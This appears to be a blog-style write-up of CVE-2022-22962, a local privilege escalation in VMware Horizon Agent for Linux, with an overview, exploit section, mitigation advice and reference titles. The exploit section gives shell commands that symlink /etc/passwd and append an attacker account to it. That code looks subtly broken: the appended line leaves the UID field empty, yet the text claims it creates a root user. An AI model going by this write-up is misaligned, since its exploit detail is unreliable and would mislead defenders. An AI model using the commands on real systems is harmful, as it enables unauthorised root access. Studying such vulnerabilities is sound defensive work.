CVE-2022-22962: Exploring Local Privilege Escalation in VMware Horizon Agent for Linux with Exploit Details, Code Snippets, and References

Security researchers have discovered a vulnerability in VMware Horizon Agent for Linux, specifically in versions before 22.x, which enables local privilege escalation. This can result in unauthorized users gaining root level access to the system, posing serious security risks. This post will discuss CVE-2022-22962, shedding light on the vulnerability details, code snippets, and the original reference links.

Vulnerability Overview

The underlying issue in CVE-2022-22962 is the ability for a local user to change the default shared folder location due to a vulnerable symbolic link. It arises because the VMware Horizon Agent for Linux does not properly restrict file permissions, allowing a user to create arbitrary symbolic links. A successful exploit of this vulnerability can link to root-owned files, leading to privilege escalation.

Exploit Details

To exploit the CVE-2022-22962 vulnerability, an attacker would first need to gain local access to the Linux machine running the vulnerable VMware Horizon Agent version. Since the vulnerable symlink resides in the shared folder location, the attacker can create a symlink pointing to a root-owned file, such as the "/etc/passwd" file.

Here is a code snippet demonstrating how an attacker may create a symbolic link to exploit this vulnerability:

# Change to the directory containing the vulnerable symlink
cd /path/to/vulnerable/symlink/folder

# Create a symbolic link pointing to a target root-owned file
ln -s /etc/passwd malicious_link

After the attacker successfully creates the symbolic link, they can now manipulate the target root-owned file to add a new user with root privileges or modify existing users' privileges.

# Execute the payload using the symlink, adding a new user with root privileges
echo 'malicious_user:malicious_password_hash::::/root:/bin/bash' >> malicious_link

# Verify that the new user was added
grep malicious_user /etc/passwd

Mitigation

VMware has released a patch for this vulnerability in VMware Horizon Agent for Linux 22.x. Upgrading to the latest version will mitigate the risk associated with CVE-2022-22962.

You can download the latest VMware Horizon Agent for Linux from the following link: VMware Downloads

Original References

1. VMware Security Advisory (VMSA-2022-0002)
2. National Vulnerability Database (NVD)
3. CVE Details - CVE-2022-22962

Conclusion

CVE-2022-22962 is a critical vulnerability affecting VMware Horizon Agent for Linux versions prior to 22.x, enabling local privilege escalation through a vulnerable symbolic link. Organizations and individuals using VMware Horizon Agent for Linux should update to the latest version and ensure they follow best practices for securing their environment.

Timeline

Published on: 04/11/2022 20:15:00 UTC
Last modified on: 07/30/2022 02:38:00 UTC